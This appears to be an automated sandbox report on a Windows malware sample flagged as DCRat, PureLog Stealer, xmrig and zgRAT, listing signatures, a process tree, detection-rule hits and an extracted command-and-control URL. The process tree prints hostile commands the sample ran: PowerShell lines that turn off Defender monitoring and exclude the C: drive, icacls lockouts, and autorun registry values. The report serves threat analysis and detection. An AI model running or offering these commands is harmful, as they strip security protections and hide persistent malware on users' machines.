Windows Analysis Report
IYXE4Uz61k.exe

Overview

General Information

Sample name: IYXE4Uz61k.exe (renamed because the original name is a hash value)
Original sample name: 0c1cb4cc583aabc07f0482f7e0767ecf.exe
Analysis ID: 1571089
MD5: 0c1cb4cc583aabc07f0482f7e0767ecf
SHA1: 2b1cc7fdfd2ec5668df1e1f0ff15153f70523e71
SHA256: 8ee6e8e2e26826c0d702f32e5cab8a3a551c6b92481b76d1b16b9e7fb3f62607
Tags: CoinMiner, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, Xmrig, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list
Binary is likely a compiled AutoIt script file
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Detected Stratum mining protocol
Disables Windows Defender (via service or powershell)
Drops PE files to the startup folder
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Found strings related to Crypto-Mining
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Process Start Locations
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • IYXE4Uz61k.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\IYXE4Uz61k.exe" MD5: 0C1CB4CC583AABC07F0482F7E0767ECF)
    • powershell.exe (PID: 7392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7636 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\ MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7828 cmdline: C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7936 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • tasklist.exe (PID: 7952 cmdline: tasklist /FI "IMAGENAME eq Superfetch.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • find.exe (PID: 7960 cmdline: find /I /N "Superfetch.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
        • takeown.exe (PID: 7996 cmdline: takeown /f c:\windows\tasks MD5: A9AB2877AE82A53F5A387B045BF326A4)
        • timeout.exe (PID: 8016 cmdline: TIMEOUT /T 3 /NOBREAK MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • powershell.exe (PID: 8068 cmdline: powershell Set-MpPreference -DisableRealtimeMonitoring $True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 8168 cmdline: powershell Set-MpPreference -ExclusionPath c:\ MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • icacls.exe (PID: 4192 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • icacls.exe (PID: 3616 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • icacls.exe (PID: 5296 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • icacls.exe (PID: 2992 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • icacls.exe (PID: 5228 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • icacls.exe (PID: 2124 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • icacls.exe (PID: 7244 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • timeout.exe (PID: 4144 cmdline: TIMEOUT /T 3 /NOBREAK MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • migrate.exe (PID: 7404 cmdline: c:\programdata\migrate.exe -p4432 MD5: 20737946FC89B9DB44F82EAE5AD41ACB)
          • cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 7516 cmdline: TIMEOUT /T 1 /NOBREAK MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • Wmiic.exe (PID: 7716 cmdline: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe MD5: A18BFE142F059FDB5C041A310339D4FD)
              • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 7804 cmdline: TIMEOUT /T 1 /NOBREAK MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • Wmiic.exe (PID: 7644 cmdline: "C:\windows\tasks\wmiic" start WMService MD5: A18BFE142F059FDB5C041A310339D4FD)
              • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 6676 cmdline: TIMEOUT /T 2 /NOBREAK MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • net.exe (PID: 2188 cmdline: net start WMService MD5: 31890A7DE89936F922D44D677F681A7F)
              • net1.exe (PID: 2336 cmdline: C:\Windows\system32\net1 start WMService MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
            • 1.exe (PID: 5228 cmdline: "C:\windows\tasks\1.exe" MD5: E94C69B02CC5FB2B03FC32AA55760AAF)
              • wscript.exe (PID: 5316 cmdline: "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
                • cmd.exe (PID: 6112 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\fwJLoWFGhpY.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • Bridgeprovider.exe (PID: 4144 cmdline: "C:\Windows/Bridgeprovider.exe" MD5: BF9DDFDD875FA2BADBE94E88A1FC4214)
                    • csc.exe (PID: 5436 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                      • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7468 cmdline: TIMEOUT /T 3 /NOBREAK MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • Wmiic.exe (PID: 7384 cmdline: C:\windows\tasks\Wmiic.exe MD5: A18BFE142F059FDB5C041A310339D4FD)
    • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • IntelConfigService.exe (PID: 7904 cmdline: "IntelConfigService.exe" MD5: 58E4115267B276452EDC1F541E3A8198)
      • Wrap.exe (PID: 7964 cmdline: C:\Windows\Tasks\Wrap.exe MD5: 39ADB356036E91008843B83EFB61131D)
        • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8072 cmdline: C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • ApplicationsFrameHost.exe (PID: 2044 cmdline: C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized MD5: 93CEEF4357070A8DDC0BEAC173547EC1)
      • cmd.exe (PID: 8000 cmdline: C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • icacls.exe (PID: 8144 cmdline: icacls C:\Windows\Tasks /deny "user-PC$:(R,REA,RA,RD)" MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • cmd.exe (PID: 4040 cmdline: C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • icacls.exe (PID: 8180 cmdline: icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)" MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • cmd.exe (PID: 3736 cmdline: C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • icacls.exe (PID: 8156 cmdline: icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))" MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • Superfetch.exe (PID: 3220 cmdline: C:\Windows\Tasks\Superfetch.exe MD5: 362FFCE5C7C480702A615F1847191F62)
      • MSTask.exe (PID: 8172 cmdline: C:\Windows\Tasks\MSTask.exe MD5: 92A9C0EF09F955F9F1BCA837D7AA493F)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • MSTask.exe (PID: 3272 cmdline: C:\Windows\Tasks\MSTask.exe MD5: 92A9C0EF09F955F9F1BCA837D7AA493F)
  • cleanup
Malware family information

Name: DCRat
Description: DCRat is a typical RAT that has been around since at least June 2019.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Name: zgRAT
Description: zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Extracted malware configuration (DCRat): {"C2 url": "http://193.32.162.64/Linelow"}
Yara matches in network traffic

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Yara matches in dropped files (5 entries in total)

Source | Rule | Description | Author
C:\Windows\Tasks\config.json | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
C:\Windows\INF\MicrosoftDefenger.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Windows\INF\MicrosoftDefenger.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Windows\Bridgeprovider.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Windows\Bridgeprovider.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Yara matches in memory dumps (13 entries in total; first 5 shown)

Source | Rule | Description | Author
00000035.00000003.1908378022.0000020033251000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000035.00000002.4148260496.00000200332C1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000003C.00000003.1921505628.0000000006A67000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000035.00000003.2249324527.000002003380A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000035.00000003.2249769366.00000200332C8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Yara matches in unpacked PEs (10 entries in total; first 5 shown)

Source | Rule | Description | Author
60.3.1.exe.6ab56f0.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
60.3.1.exe.6ab56f0.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
60.3.1.exe.6ab06f0.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
60.3.1.exe.6ab06f0.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
26.3.migrate.exe.93436f7.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton, Data: Command: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe, CommandLine: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe, CommandLine|base64offset|contains: {-jY, Image: C:\Windows\Tasks\Wmiic.exe, NewProcessName: C:\Windows\Tasks\Wmiic.exe, OriginalFileName: C:\Windows\Tasks\Wmiic.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe, ProcessId: 7716, ProcessName: Wmiic.exe
Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 5436, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IYXE4Uz61k.exe", ParentImage: C:\Users\user\Desktop\IYXE4Uz61k.exe, ParentProcessId: 7348, ParentProcessName: IYXE4Uz61k.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, ProcessId: 7392, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IYXE4Uz61k.exe", ParentImage: C:\Users\user\Desktop\IYXE4Uz61k.exe, ParentProcessId: 7348, ParentProcessName: IYXE4Uz61k.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, ProcessId: 7392, ProcessName: powershell.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: "C:\windows\inf\MicrosoftDefenger.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\Bridgeprovider.exe, ProcessId: 4144, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftDefenger
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: explorer.exe, "C:\windows\inf\MicrosoftDefenger.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\Bridgeprovider.exe, ProcessId: 4144, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows/Bridgeprovider.exe", ParentImage: C:\Windows\Bridgeprovider.exe, ParentProcessId: 4144, ParentProcessName: Bridgeprovider.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline", ProcessId: 5436, ProcessName: csc.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IYXE4Uz61k.exe", ParentImage: C:\Users\user\Desktop\IYXE4Uz61k.exe, ParentProcessId: 7348, ParentProcessName: IYXE4Uz61k.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\, ProcessId: 7636, ProcessName: powershell.exe
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7536, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftPrt.exe
Source: Process started, Author: juju4, Jonhnathan Ribeiro, oscd.community, Data: Command: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe, CommandLine: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe, CommandLine|base64offset|contains: {-jY, Image: C:\Windows\Tasks\Wmiic.exe, NewProcessName: C:\Windows\Tasks\Wmiic.exe, OriginalFileName: C:\Windows\Tasks\Wmiic.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe, ProcessId: 7716, ProcessName: Wmiic.exe
Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\windows\tasks\1.exe" , ParentImage: C:\Windows\Tasks\1.exe, ParentProcessId: 5228, ParentProcessName: 1.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe" , ProcessId: 5316, ProcessName: wscript.exe
Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Windows\Bridgeprovider.exe, ProcessId: 4144, TargetFilename: C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline
Source: Process started, Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements), Data: Command: net start WMService, CommandLine: net start WMService, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: net start WMService, ProcessId: 2188, ProcessName: net.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IYXE4Uz61k.exe", ParentImage: C:\Users\user\Desktop\IYXE4Uz61k.exe, ParentProcessId: 7348, ParentProcessName: IYXE4Uz61k.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, ProcessId: 7392, ProcessName: powershell.exe
Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community, Data: Command: net start WMService, CommandLine: net start WMService, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: net start WMService, ProcessId: 2188, ProcessName: net.exe

Data Obfuscation

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows/Bridgeprovider.exe", ParentImage: C:\Windows\Bridgeprovider.exe, ParentProcessId: 4144, ParentProcessName: Bridgeprovider.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline", ProcessId: 5436, ProcessName: csc.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-08T23:02:43.286483+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 193.32.162.64 | 80 | TCP

                                  AV Detection

                                  barindex
                                  Source: C:\Users\user\Desktop\UtDRkwHy.logAvira: detection malicious, Label: HEUR/AGEN.1300079
